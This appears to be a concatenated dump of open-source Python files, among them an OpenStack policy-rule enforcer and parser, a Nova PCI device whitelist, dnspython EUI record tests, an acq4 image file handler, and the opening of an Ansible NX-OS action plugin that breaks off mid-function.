def __init__(self, policy_file=None, rules=None,
default_rule=None, use_conf=True):
self.rules = Rules(rules, default_rule)
self.default_rule = default_rule or CONF.policy_default_rule
self.policy_path = None
self.policy_file = policy_file or CONF.policy_file
self.use_conf = use_conf
def set_rules(self, rules, overwrite=True, use_conf=False):
"""Create a new Rules object based on the provided dict of rules.
:param rules: New rules to use. It should be an instance of dict.
:param overwrite: Whether to overwrite current rules or update them
with the new rules.
:param use_conf: Whether to reload rules from cache or config file.
"""
if not isinstance(rules, dict):
raise TypeError(_("Rules must be an instance of dict or Rules, "
"got %s instead") % type(rules))
self.use_conf = use_conf
if overwrite:
self.rules = Rules(rules, self.default_rule)
else:
self.rules.update(rules)
def clear(self):
"""Clears Enforcer rules, policy's cache and policy's path."""
self.set_rules({})
fileutils.delete_cached_file(self.policy_path)
self.default_rule = None
self.policy_path = None
def load_rules(self, force_reload=False):
"""Loads policy_path's rules.
Policy file is cached and will be reloaded if modified.
:param force_reload: Whether to overwrite current rules.
"""
if force_reload:
self.use_conf = force_reload
if self.use_conf:
if not self.policy_path:
self.policy_path = self._get_policy_path(self.policy_file)
self._load_policy_file(self.policy_path, force_reload)
for path in CONF.policy_dirs:
try:
path = self._get_policy_path(path)
except cfg.ConfigFilesNotFoundError:
LOG.warn(_LW("Can not find policy directories %s"), path)
continue
self._walk_through_policy_directory(path,
self._load_policy_file,
force_reload, False)
def _walk_through_policy_directory(self, path, func, *args):
# We do not iterate over sub-directories.
policy_files = next(os.walk(path))[2]
policy_files.sort()
for policy_file in [p for p in policy_files if not p.startswith('.')]:
func(os.path.join(path, policy_file), *args)
def _load_policy_file(self, path, force_reload, overwrite=True):
reloaded, data = fileutils.read_cached_file(
path, force_reload=force_reload)
if reloaded or not self.rules:
rules = Rules.load_json(data, self.default_rule)
self.set_rules(rules, overwrite)
LOG.debug("Rules successfully reloaded")
def _get_policy_path(self, path):
"""Locate the policy json data file/path.
:param path: It's value can be a full path or related path. When
full path specified, this function just returns the full
path. When related path specified, this function will
search configuration directories to find one that exists.
:returns: The policy path
:raises: ConfigFilesNotFoundError if the file/path couldn't
be located.
"""
policy_path = CONF.find_file(path)
if policy_path:
return policy_path
raise cfg.ConfigFilesNotFoundError((path,))
def enforce(self, rule, target, creds, do_raise=False,
exc=None, *args, **kwargs):
"""Checks authorization of a rule against the target and credentials.
:param rule: A string or BaseCheck instance specifying the rule
to evaluate.
:param target: As much information about the object being operated
on as possible, as a dictionary.
:param creds: As much information about the user performing the
action as possible, as a dictionary.
:param do_raise: Whether to raise an exception or not if check
fails.
:param exc: Class of the exception to raise if the check fails.
Any remaining arguments passed to enforce() (both
positional and keyword arguments) will be passed to
the exception class. If not specified, PolicyNotAuthorized
will be used.
:return: Returns False if the policy does not allow the action and
exc is not provided; otherwise, returns a value that
evaluates to True. Note: for rules using the "case"
expression, this True value will be the specified string
from the expression.
"""
self.load_rules()
# Allow the rule to be a Check tree
if isinstance(rule, BaseCheck):
result = rule(target, creds, self)
elif not self.rules:
# No rules to reference means we're going to fail closed
result = False
else:
try:
# Evaluate the rule
result = self.rules[rule](target, creds, self)
except KeyError:
LOG.debug("Rule [%s] doesn't exist" % rule)
# If the rule doesn't exist, fail closed
result = False
# If it is False, raise the exception if requested
if do_raise and not result:
if exc:
raise exc(*args, **kwargs)
raise PolicyNotAuthorized(rule)
return result
@six.add_metaclass(abc.ABCMeta)
class BaseCheck(object):
"""Abstract base class for Check classes."""
@abc.abstractmethod
def __str__(self):
"""String representation of the Check tree rooted at this node."""
pass
@abc.abstractmethod
def __call__(self, target, cred, enforcer):
"""Triggers if instance of the class is called.
Performs the check. Returns False to reject the access or a
true value (not necessary True) to accept the access.
"""
pass
class FalseCheck(BaseCheck):
"""A policy check that always returns False (disallow)."""
def __str__(self):
"""Return a string representation of this check."""
return "!"
def __call__(self, target, cred, enforcer):
"""Check the policy."""
return False
class TrueCheck(BaseCheck):
"""A policy check that always returns True (allow)."""
def __str__(self):
"""Return a string representation of this check."""
return "@"
def __call__(self, target, cred, enforcer):
"""Check the policy."""
return True
class Check(BaseCheck):
"""A base class to allow for user-defined policy checks."""
def __init__(self, kind, match):
"""Initiates Check instance.
:param kind: The kind of the check, i.e., the field before the
':'.
:param match: The match of the check, i.e., the field after
the ':'.
"""
self.kind = kind
self.match = match
def __str__(self):
"""Return a string representation of this check."""
return "%s:%s" % (self.kind, self.match)
class NotCheck(BaseCheck):
"""Implements the "not" logical operator.
A policy check that inverts the result of another policy check.
"""
def __init__(self, rule):
"""Initialize the 'not' check.
:param rule: The rule to negate. Must be a Check.
"""
self.rule = rule
def __str__(self):
"""Return a string representation of this check."""
return "not %s" % self.rule
def __call__(self, target, cred, enforcer):
"""Check the policy.
Returns the logical inverse of the wrapped check.
"""
return not self.rule(target, cred, enforcer)
class AndCheck(BaseCheck):
"""Implements the "and" logical operator.
A policy check that requires that a list of other checks all return True.
"""
def __init__(self, rules):
"""Initialize the 'and' check.
:param rules: A list of rules that will be tested.
"""
self.rules = rules
def __str__(self):
"""Return a string representation of this check."""
return "(%s)" % ' and '.join(str(r) for r in self.rules)
def __call__(self, target, cred, enforcer):
"""Check the policy.
Requires that all rules accept in order to return True.
"""
for rule in self.rules:
if not rule(target, cred, enforcer):
return False
return True
def add_check(self, rule):
"""Adds rule to be tested.
Allows addition of another rule to the list of rules that will
be tested. Returns the AndCheck object for convenience.
"""
self.rules.append(rule)
return self
class OrCheck(BaseCheck):
"""Implements the "or" operator.
A policy check that requires that at least one of a list of other
checks returns True.
"""
def __init__(self, rules):
"""Initialize the 'or' check.
:param rules: A list of rules that will be tested.
"""
self.rules = rules
def __str__(self):
"""Return a string representation of this check."""
return "(%s)" % ' or '.join(str(r) for r in self.rules)
def __call__(self, target, cred, enforcer):
"""Check the policy.
Requires that at least one rule accept in order to return True.
"""
for rule in self.rules:
if rule(target, cred, enforcer):
return True
return False
def add_check(self, rule):
"""Adds rule to be tested.
Allows addition of another rule to the list of rules that will
be tested. Returns the OrCheck object for convenience.
"""
self.rules.append(rule)
return self
def _parse_check(rule):
"""Parse a single base check rule into an appropriate Check object."""
# Handle the special checks
if rule == '!':
return FalseCheck()
elif rule == '@':
return TrueCheck()
try:
kind, match = rule.split(':', 1)
except Exception:
LOG.exception(_LE("Failed to understand rule %s") % rule)
# If the rule is invalid, we'll fail closed
return FalseCheck()
# Find what implements the check
if kind in _checks:
return _checks[kind](kind, match)
elif None in _checks:
return _checks[None](kind, match)
else:
LOG.error(_LE("No handler for matches of kind %s") % kind)
return FalseCheck()
def _parse_list_rule(rule):
"""Translates the old list-of-lists syntax into a tree of Check objects.
Provided for backwards compatibility.
"""
# Empty rule defaults to True
if not rule:
return TrueCheck()
# Outer list is joined by "or"; inner list by "and"
or_list = []
for inner_rule in rule:
# Elide empty inner lists
if not inner_rule:
continue
# Handle bare strings
if isinstance(inner_rule, six.string_types):
inner_rule = [inner_rule]
# Parse the inner rules into Check objects
and_list = [_parse_check(r) for r in inner_rule]
# Append the appropriate check to the or_list
if len(and_list) == 1:
or_list.append(and_list[0])
else:
or_list.append(AndCheck(and_list))
# If we have only one check, omit the "or"
if not or_list:
return FalseCheck()
elif len(or_list) == 1:
return or_list[0]
return OrCheck(or_list)
# Used for tokenizing the policy language
_tokenize_re = re.compile(r'\s+')
def _parse_tokenize(rule):
"""Tokenizer for the policy language.
Most of the single-character tokens are specified in the
_tokenize_re; however, parentheses need to be handled specially,
because they can appear inside a check string. Thankfully, those
parentheses that appear inside a check string can never occur at
the very beginning or end ("%(variable)s" is the correct syntax).
"""
for tok in _tokenize_re.split(rule):
# Skip empty tokens
if not tok or tok.isspace():
continue
# Handle leading parens on the token
clean = tok.lstrip('(')
for i in range(len(tok) - len(clean)):
yield '(', '('
# If it was only parentheses, continue
if not clean:
continue
else:
tok = clean
# Handle trailing parens on the token
clean = tok.rstrip(')')
trail = len(tok) - len(clean)
# Yield the cleaned token
lowered = clean.lower()
if lowered in ('and', 'or', 'not'):
# Special tokens
yield lowered, clean
elif clean:
# Not a special token, but not composed solely of ')'
if len(tok) >= 2 and ((tok[0], tok[-1]) in
[('"', '"'), ("'", "'")]):
# It's a quoted string
yield 'string', tok[1:-1]
else:
yield 'check', _parse_check(clean)
# Yield the trailing parens
for i in range(trail):
yield ')', ')'
class ParseStateMeta(type):
"""Metaclass for the ParseState class.
Facilitates identifying reduction methods.
"""
def __new__(mcs, name, bases, cls_dict):
"""Create the class.
Injects the 'reducers' list, a list of tuples matching token sequences
to the names of the corresponding reduction methods.
"""
reducers = []
for key, value in cls_dict.items():
if not hasattr(value, 'reducers'):
continue
for reduction in value.reducers:
reducers.append((reduction, key))
cls_dict['reducers'] = reducers
return super(ParseStateMeta, mcs).__new__(mcs, name, bases, cls_dict)
def reducer(*tokens):
"""Decorator for reduction methods.
Arguments are a sequence of tokens, in order, which should trigger running
this reduction method.
"""
def decorator(func):
# Make sure we have a list of reducer sequences
if not hasattr(func, 'reducers'):
func.reducers = []
# Add the tokens to the list of reducer sequences
func.reducers.append(list(tokens))
return func
return decorator
@six.add_metaclass(ParseStateMeta)
class ParseState(object):
"""Implement the core of parsing the policy language.
Uses a greedy reduction algorithm to reduce a sequence of tokens into
a single terminal, the value of which will be the root of the Check tree.
Note: error reporting is rather lacking. The best we can get with
this parser formulation is an overall "parse failed" error.
Fortunately, the policy language is simple enough that this
shouldn't be that big a problem.
"""
def __init__(self):
"""Initialize the ParseState."""
self.tokens = []
self.values = []
def reduce(self):
"""Perform a greedy reduction of the token stream.
If a reducer method matches, it will be executed, then the
reduce() method will be called recursively to search for any more
possible reductions.
"""
for reduction, methname in self.reducers:
if (len(self.tokens) >= len(reduction) and
self.tokens[-len(reduction):] == reduction):
# Get the reduction method
meth = getattr(self, methname)
# Reduce the token stream
results = meth(*self.values[-len(reduction):])
# Update the tokens and values
self.tokens[-len(reduction):] = [r[0] for r in results]
self.values[-len(reduction):] = [r[1] for r in results]
# Check for any more reductions
return self.reduce()
def shift(self, tok, value):
"""Adds one more token to the state. Calls reduce()."""
self.tokens.append(tok)
self.values.append(value)
# Do a greedy reduce...
self.reduce()
@property
def result(self):
"""Obtain the final result of the parse.
Raises ValueError if the parse failed to reduce to a single result.
"""
if len(self.values) != 1:
raise ValueError("Could not parse rule")
return self.values[0]
@reducer('(', 'check', ')')
@reducer('(', 'and_expr', ')')
@reducer('(', 'or_expr', ')')
def _wrap_check(self, _p1, check, _p2):
"""Turn parenthesized expressions into a 'check' token."""
return [('check', check)]
@reducer('check', 'and', 'check')
def _make_and_expr(self, check1, _and, check2):
"""Create an 'and_expr'.
Join two checks by the 'and' operator.
"""
return [('and_expr', AndCheck([check1, check2]))]
@reducer('and_expr', 'and', 'check')
def _extend_and_expr(self, and_expr, _and, check):
"""Extend an 'and_expr' by adding one more check."""
return [('and_expr', and_expr.add_check(check))]
@reducer('check', 'or', 'check')
def _make_or_expr(self, check1, _or, check2):
"""Create an 'or_expr'.
Join two checks by the 'or' operator.
"""
return [('or_expr', OrCheck([check1, check2]))]
@reducer('or_expr', 'or', 'check')
def _extend_or_expr(self, or_expr, _or, check):
"""Extend an 'or_expr' by adding one more check."""
return [('or_expr', or_expr.add_check(check))]
@reducer('not', 'check')
def _make_not_expr(self, _not, check):
"""Invert the result of another check."""
return [('check', NotCheck(check))]
def _parse_text_rule(rule):
"""Parses policy to the tree.
Translates a policy written in the policy language into a tree of
Check objects.
"""
# Empty rule means always accept
if not rule:
return TrueCheck()
# Parse the token stream
state = ParseState()
for tok, value in _parse_tokenize(rule):
state.shift(tok, value)
try:
return state.result
except ValueError:
# Couldn't parse the rule
LOG.exception(_LE("Failed to understand rule %s") % rule)
# Fail closed
return FalseCheck()
def parse_rule(rule):
"""Parses a policy rule into a tree of Check objects."""
# If the rule is a string, it's in the policy language
if isinstance(rule, six.string_types):
return _parse_text_rule(rule)
return _parse_list_rule(rule)
def register(name, func=None):
"""Register a function or Check class as a policy check.
:param name: Gives the name of the check type, e.g., 'rule',
'role', etc. If name is None, a default check type
will be registered.
:param func: If given, provides the function or class to register.
If not given, returns a function taking one argument
to specify the function or class to register,
allowing use as a decorator.
"""
# Perform the actual decoration by registering the function or
# class. Returns the function or class for compliance with the
# decorator interface.
def decorator(func):
_checks[name] = func
return func
# If the function or class is given, do the registration
if func:
return decorator(func)
return decorator
@register("rule")
class RuleCheck(Check):
def __call__(self, target, creds, enforcer):
"""Recursively checks credentials based on the defined rules."""
try:
return enforcer.rules[self.match](target, creds, enforcer)
except KeyError:
# We don't have any matching rule; fail closed
return False
@register("role")
class RoleCheck(Check):
def __call__(self, target, creds, enforcer):
"""Check that there is a matching role in the cred dict."""
return self.match.lower() in [x.lower() for x in creds['roles']]
@register('http')
class HttpCheck(Check):
def __call__(self, target, creds, enforcer):
"""Check http: rules by calling to a remote server.
This example implementation simply verifies that the response
is exactly 'True'.
"""
url = ('http:' + self.match) % target
data = {'target': jsonutils.dumps(target),
'credentials': jsonutils.dumps(creds)}
post_data = urlparse.urlencode(data)
f = urlrequest.urlopen(url, post_data)
return f.read() == "True"
@register(None)
class GenericCheck(Check):
def __call__(self, target, creds, enforcer):
"""Check an individual match.
Matches look like:
tenant:%(tenant_id)s
role:compute:admin
True:%(user.enabled)s
'Member':%(role.name)s
"""
try:
match = self.match % target
except KeyError:
# While doing GenericCheck if key not
# present in Target return false
return False
try:
# Try to interpret self.kind as a literal
leftval = ast.literal_eval(self.kind)
except ValueError:
try:
kind_parts = self.kind.split('.')
leftval = creds
for kind_part in kind_parts:
leftval = leftval[kind_part]
except KeyError:
return False
return match == six.text_type(leftval)
| apache-2.0 |
JioCloud/nova_test_latest | nova/pci/whitelist.py | 35 | 4103 | # Copyright (c) 2013 Intel, Inc.
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from nova import exception
from nova.i18n import _
from nova.pci import devspec
pci_opts = [cfg.MultiStrOpt('pci_passthrough_whitelist',
default=[],
help='White list of PCI devices available to VMs. '
'For example: pci_passthrough_whitelist = '
'[{"vendor_id": "8086", "product_id": "0443"}]'
)
]
CONF = cfg.CONF
CONF.register_opts(pci_opts)
LOG = logging.getLogger(__name__)
class PciHostDevicesWhiteList(object):
"""White list class to decide assignable pci devices.
Not all devices on compute node can be assigned to guest, the
cloud administrator decides the devices that can be assigned
based on vendor_id or product_id etc. If no white list specified,
no device will be assignable.
"""
def _parse_white_list_from_config(self, whitelists):
"""Parse and validate the pci whitelist from the nova config."""
specs = []
for jsonspec in whitelists:
try:
dev_spec = jsonutils.loads(jsonspec)
except ValueError:
raise exception.PciConfigInvalidWhitelist(
reason=_("Invalid entry: '%s'") % jsonspec)
if isinstance(dev_spec, dict):
dev_spec = [dev_spec]
elif not isinstance(dev_spec, list):
raise exception.PciConfigInvalidWhitelist(
reason=_("Invalid entry: '%s'; "
"Expecting list or dict") % jsonspec)
for ds in dev_spec:
if not isinstance(ds, dict):
raise exception.PciConfigInvalidWhitelist(
reason=_("Invalid entry: '%s'; "
"Expecting dict") % ds)
spec = devspec.PciDeviceSpec(ds)
specs.append(spec)
return specs
def __init__(self, whitelist_spec=None):
"""White list constructor
For example, followed json string specifies that devices whose
vendor_id is '8086' and product_id is '1520' can be assigned
to guest.
'[{"product_id":"1520", "vendor_id":"8086"}]'
:param whitelist_spec: A json string for a list of dictionaries,
each dictionary specifies the pci device
properties requirement.
"""
super(PciHostDevicesWhiteList, self).__init__()
if whitelist_spec:
self.specs = self._parse_white_list_from_config(whitelist_spec)
else:
self.specs = []
def device_assignable(self, dev):
"""Check if a device can be assigned to a guest.
:param dev: A dictionary describing the device properties
"""
for spec in self.specs:
if spec.match(dev):
return spec
def get_devspec(self, pci_dev):
for spec in self.specs:
if spec.match_pci_obj(pci_dev):
return spec
def get_pci_devices_filter():
return PciHostDevicesWhiteList(CONF.pci_passthrough_whitelist)
def get_pci_device_devspec(pci_dev):
dev_filter = get_pci_devices_filter()
return dev_filter.get_devspec(pci_dev)
| apache-2.0 |
cloudera/hue | desktop/core/ext-py/dnspython-1.15.0/tests/test_rdtypeanyeui.py | 4 | 9292 | # Copyright (C) 2015 Red Hat, Inc.
# Author: Petr Spacek <[email protected]>
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED 'AS IS' AND RED HAT DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
try:
import unittest2 as unittest
except ImportError:
import unittest
from io import BytesIO
import dns.rrset
import dns.rdtypes.ANY.EUI48
import dns.rdtypes.ANY.EUI64
import dns.exception
class RdtypeAnyEUI48TestCase(unittest.TestCase):
def testInstOk(self):
'''Valid binary input.'''
eui = b'\x01\x23\x45\x67\x89\xab'
inst = dns.rdtypes.ANY.EUI48.EUI48(dns.rdataclass.IN,
dns.rdatatype.EUI48,
eui)
self.assertEqual(inst.eui, eui)
def testInstLength(self):
'''Incorrect input length.'''
eui = b'\x01\x23\x45\x67\x89\xab\xcd'
with self.assertRaises(dns.exception.FormError):
dns.rdtypes.ANY.EUI48.EUI48(dns.rdataclass.IN,
dns.rdatatype.EUI48,
eui)
def testFromTextOk(self):
'''Valid text input.'''
r1 = dns.rrset.from_text('foo', 300, 'IN', 'EUI48',
'01-23-45-67-89-ab')
eui = b'\x01\x23\x45\x67\x89\xab'
self.assertEqual(r1[0].eui, eui)
def testFromTextLength(self):
'''Invalid input length.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI48',
'00-01-23-45-67-89-ab')
def testFromTextDelim(self):
'''Invalid delimiter.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI48', '01_23-45-67-89-ab')
def testFromTextExtraDash(self):
'''Extra dash instead of hex digit.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI48', '0--23-45-67-89-ab')
def testFromTextMultipleTokens(self):
'''Invalid input divided to multiple tokens.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI48', '01 23-45-67-89-ab')
def testFromTextInvalidHex(self):
'''Invalid hexadecimal input.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI48', 'g0-23-45-67-89-ab')
def testToTextOk(self):
'''Valid text output.'''
eui = b'\x01\x23\x45\x67\x89\xab'
exp_text = '01-23-45-67-89-ab'
inst = dns.rdtypes.ANY.EUI48.EUI48(dns.rdataclass.IN,
dns.rdatatype.EUI48,
eui)
text = inst.to_text()
self.assertEqual(exp_text, text)
def testToWire(self):
'''Valid wire format.'''
eui = b'\x01\x23\x45\x67\x89\xab'
inst = dns.rdtypes.ANY.EUI48.EUI48(dns.rdataclass.IN,
dns.rdatatype.EUI48,
eui)
buff = BytesIO()
inst.to_wire(buff)
self.assertEqual(buff.getvalue(), eui)
def testFromWireOk(self):
'''Valid wire format.'''
eui = b'\x01\x23\x45\x67\x89\xab'
pad_len = 100
wire = dns.wiredata.WireData(b'x' * pad_len + eui + b'y' * pad_len * 2)
inst = dns.rdtypes.ANY.EUI48.EUI48.from_wire(dns.rdataclass.IN,
dns.rdatatype.EUI48,
wire,
pad_len,
len(eui))
self.assertEqual(inst.eui, eui)
def testFromWireLength(self):
'''Valid wire format.'''
eui = b'\x01\x23\x45\x67\x89'
pad_len = 100
wire = dns.wiredata.WireData(b'x' * pad_len + eui + b'y' * pad_len * 2)
with self.assertRaises(dns.exception.FormError):
dns.rdtypes.ANY.EUI48.EUI48.from_wire(dns.rdataclass.IN,
dns.rdatatype.EUI48,
wire,
pad_len,
len(eui))
class RdtypeAnyEUI64TestCase(unittest.TestCase):
def testInstOk(self):
'''Valid binary input.'''
eui = b'\x01\x23\x45\x67\x89\xab\xcd\xef'
inst = dns.rdtypes.ANY.EUI64.EUI64(dns.rdataclass.IN,
dns.rdatatype.EUI64,
eui)
self.assertEqual(inst.eui, eui)
def testInstLength(self):
'''Incorrect input length.'''
eui = b'\x01\x23\x45\x67\x89\xab'
with self.assertRaises(dns.exception.FormError):
dns.rdtypes.ANY.EUI64.EUI64(dns.rdataclass.IN,
dns.rdatatype.EUI64,
eui)
def testFromTextOk(self):
'''Valid text input.'''
r1 = dns.rrset.from_text('foo', 300, 'IN', 'EUI64',
'01-23-45-67-89-ab-cd-ef')
eui = b'\x01\x23\x45\x67\x89\xab\xcd\xef'
self.assertEqual(r1[0].eui, eui)
def testFromTextLength(self):
'''Invalid input length.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI64',
'01-23-45-67-89-ab')
def testFromTextDelim(self):
'''Invalid delimiter.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI64',
'01_23-45-67-89-ab-cd-ef')
def testFromTextExtraDash(self):
'''Extra dash instead of hex digit.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI64',
'0--23-45-67-89-ab-cd-ef')
def testFromTextMultipleTokens(self):
'''Invalid input divided to multiple tokens.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI64',
'01 23-45-67-89-ab-cd-ef')
def testFromTextInvalidHex(self):
'''Invalid hexadecimal input.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI64',
'g0-23-45-67-89-ab-cd-ef')
def testToTextOk(self):
'''Valid text output.'''
eui = b'\x01\x23\x45\x67\x89\xab\xcd\xef'
exp_text = '01-23-45-67-89-ab-cd-ef'
inst = dns.rdtypes.ANY.EUI64.EUI64(dns.rdataclass.IN,
dns.rdatatype.EUI64,
eui)
text = inst.to_text()
self.assertEqual(exp_text, text)
def testToWire(self):
'''Valid wire format.'''
eui = b'\x01\x23\x45\x67\x89\xab\xcd\xef'
inst = dns.rdtypes.ANY.EUI64.EUI64(dns.rdataclass.IN,
dns.rdatatype.EUI64,
eui)
buff = BytesIO()
inst.to_wire(buff)
self.assertEqual(buff.getvalue(), eui)
def testFromWireOk(self):
'''Valid wire format.'''
eui = b'\x01\x23\x45\x67\x89\xab\xcd\xef'
pad_len = 100
wire = dns.wiredata.WireData(b'x' * pad_len + eui + b'y' * pad_len * 2)
inst = dns.rdtypes.ANY.EUI64.EUI64.from_wire(dns.rdataclass.IN,
dns.rdatatype.EUI64,
wire,
pad_len,
len(eui))
self.assertEqual(inst.eui, eui)
def testFromWireLength(self):
'''Valid wire format.'''
eui = b'\x01\x23\x45\x67\x89'
pad_len = 100
wire = dns.wiredata.WireData(b'x' * pad_len + eui + b'y' * pad_len * 2)
with self.assertRaises(dns.exception.FormError):
dns.rdtypes.ANY.EUI64.EUI64.from_wire(dns.rdataclass.IN,
dns.rdatatype.EUI64,
wire,
pad_len,
len(eui))
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
mgraupe/acq4 | acq4/filetypes/ImageFile.py | 4 | 5498 | # -*- coding: utf-8 -*-
from PIL import Image
## Install support for 16-bit images in PIL
if Image.VERSION == '1.1.7':
Image._MODE_CONV["I;16"] = ('%su2' % Image._ENDIAN, None)
Image._fromarray_typemap[((1, 1), "<u2")] = ("I", "I;16")
if Image.VERSION == '1.1.6':
Image._MODE_CONV["I;16"] = ('%su2' % Image._ENDIAN, None)
## just a copy of fromarray() from Image.py with I;16 added in
def fromarray(obj, mode=None):
arr = obj.__array_interface__
shape = arr['shape']
ndim = len(shape)
try:
strides = arr['strides']
except KeyError:
strides = None
if mode is None:
typestr = arr['typestr']
if not (typestr[0] == '|' or typestr[0] == Image._ENDIAN or
typestr[1:] not in ['u1', 'b1', 'i4', 'f4']):
raise TypeError("cannot handle data-type")
if typestr[0] == Image._ENDIAN:
typestr = typestr[1:3]
else:
typestr = typestr[:2]
if typestr == 'i4':
mode = 'I'
if typestr == 'u2':
mode = 'I;16'
elif typestr == 'f4':
mode = 'F'
elif typestr == 'b1':
mode = '1'
elif ndim == 2:
mode = 'L'
elif ndim == 3:
mode = 'RGB'
elif ndim == 4:
mode = 'RGBA'
else:
raise TypeError("Do not understand data.")
ndmax = 4
bad_dims=0
if mode in ['1','L','I','P','F']:
ndmax = 2
elif mode == 'RGB':
ndmax = 3
if ndim > ndmax:
raise ValueError("Too many dimensions.")
size = shape[:2][::-1]
if strides is not None:
obj = obj.tostring()
return frombuffer(mode, size, obj, "raw", mode, 0, 1)
Image.fromarray=fromarray
#import png ## better png support than PIL
from numpy import array, ndarray
from acq4.util.metaarray import MetaArray as MA
from FileType import *
#import libtiff
#from PyQt4 import QtCore, QtGui
class Array(ndarray): ## just allows us to add some dynamic attributes
def __new__(cls, arr):
return arr.view(cls)
class ImageFile(FileType):
extensions = ['.png', '.tif', '.jpg'] ## list of extensions handled by this class
dataTypes = [MA, ndarray] ## list of python types handled by this class
priority = 50 ## medium priority; MetaArray should be used for writing arrays if possible;
@classmethod
def write(cls, data, dirHandle, fileName, **args):
"""Write data to fileName.
Return the file name written (this allows the function to modify the requested file name)
"""
fileName = cls.addExtension(fileName)
ext = os.path.splitext(fileName)[1].lower()[1:]
img = Image.fromarray(data.transpose())
img.save(os.path.join(dirHandle.name(), fileName))
#if ext in ['tif', 'tiff']:
#d = data.transpose()
#tiff = libtiff.TIFFimage(d, description='')
#tiff.write_file(os.path.join(dirHandle.name(), fileName), compression='none')
#else:
#ims = data.tostring()
#img = QtGui.QImage(buffer(ims), data.shape[1], data.shape[0], QtGui.QImage.Format_ARGB32)
#w = QtGui.QImageWriter(os.path.join(dirHandle.name(), fileName), ext)
#w.write(img)
return fileName
@classmethod
def read(cls, fileHandle):
"""Read a file, return a data object"""
img = Image.open(fileHandle.name())
arr = array(img)
if arr.ndim == 0:
raise Exception("Image has no data. Either 1) this is not a valid image or 2) PIL does not support this image type.")
#ext = os.path.splitext(fileHandle.name())[1].lower()[1:]
#if ext in ['tif', 'tiff']:
#tif = libtiff.TIFFfile(fileHandle.name())
#samples, sample_names = tif.get_samples()
#if len(samples) != 1:
#arr = np.concatenate(samples)
#else:
#arr = samples[0]
#else:
#img = QtGui.QImage()
#img.load(fileHandle.name())
#ptr = img.bits()
#ptr.setsize(img.byteCount())
#buf = buffer(ptr, 0, img.byteCount())
#arr = np.frombuffer(buf, dtype=np.ubyte)
#arr.shape = (img.height(), img.width(), img.depth() / 8)
transp = range(arr.ndim) ## switch axis order y,x to x,y
if arr.ndim == 2:
transp[0] = 1
transp[1] = 0
axisHint = ['x', 'y']
elif arr.ndim == 3:
if len(img.getbands()) > 1:
transp[0] = 1
transp[1] = 0
axisHint = ['x', 'y']
else:
transp[1] = 2
transp[2] = 1
axisHint = ['t', 'x', 'y']
elif arr.ndim == 4:
transp[1] = 2
transp[2] = 1
axisHint = ['t', 'x', 'y']
else:
raise Exception("Bad image size: %s" % str(arr.ndim))
#print arr.shape
arr = arr.transpose(tuple(transp))
axisHint.append(img.getbands())
arr = Array(arr) ## allow addition of new attributes
arr.axisHint = arr
#print arr.shape
return arr
| mit |
valentin-krasontovitsch/ansible | lib/ansible/plugins/action/nxos.py | 12 | 7412 | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import copy
import re
import sys
from ansible import constants as C
from ansible.module_utils._text import to_text
from ansible.module_utils.connection import Connection
from ansible.plugins.action.network import ActionModule as ActionNetworkModule
from ansible.module_utils.network.common.utils import load_provider
from ansible.module_utils.network.nxos.nxos import nxos_provider_spec
from ansible.utils.display import Display
display = Display()
class ActionModule(ActionNetworkModule):
def run(self, tmp=None, task_vars=None):
del tmp # tmp no longer has any effect
self._config_module = True if self._task.action == 'nxos_config' else False
socket_path = None
if (self._play_context.connection == 'httpapi' or self._task.args.get('provider', {}).get('transport') == 'nxapi') \
and self._task.action in ('nxos_file_copy', 'nxos_nxapi'):
return {'failed': True, 'msg': "Transport type 'nxapi' is not valid for '%s' module." % (self._task.action)}
if self._task.action == 'nxos_file_copy':
self._task.args['host'] = self._play_context.remote_addr
self._task.args['password'] = self._play_context.password
if self._play_context.connection == 'network_cli':
